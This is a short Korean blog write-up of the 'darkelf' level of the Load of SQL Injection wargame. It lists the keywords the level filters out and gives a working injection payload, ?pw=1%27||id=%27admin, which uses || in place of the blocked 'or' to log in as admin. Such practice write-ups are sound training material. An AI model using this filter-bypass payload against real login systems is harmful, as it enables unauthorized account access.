보안 공부/Load of SQL injection
[Load of SQL Injection] Darkelf
sh1256
2022. 1. 27. 12:38
728x90
이전에 풀었던 wolfman 문제와 비슷하다. --> https://sh1256.tistory.com/60
1. 필터링
prob, _, .(마침표), \, or, land
2. 1'or id='admin 값 넣기
3. or 대신에 || 사용 (and 대신에는 && 사용 가능)
결과: URL 뒤에
?pw=1%27||id=%27admin
붙이기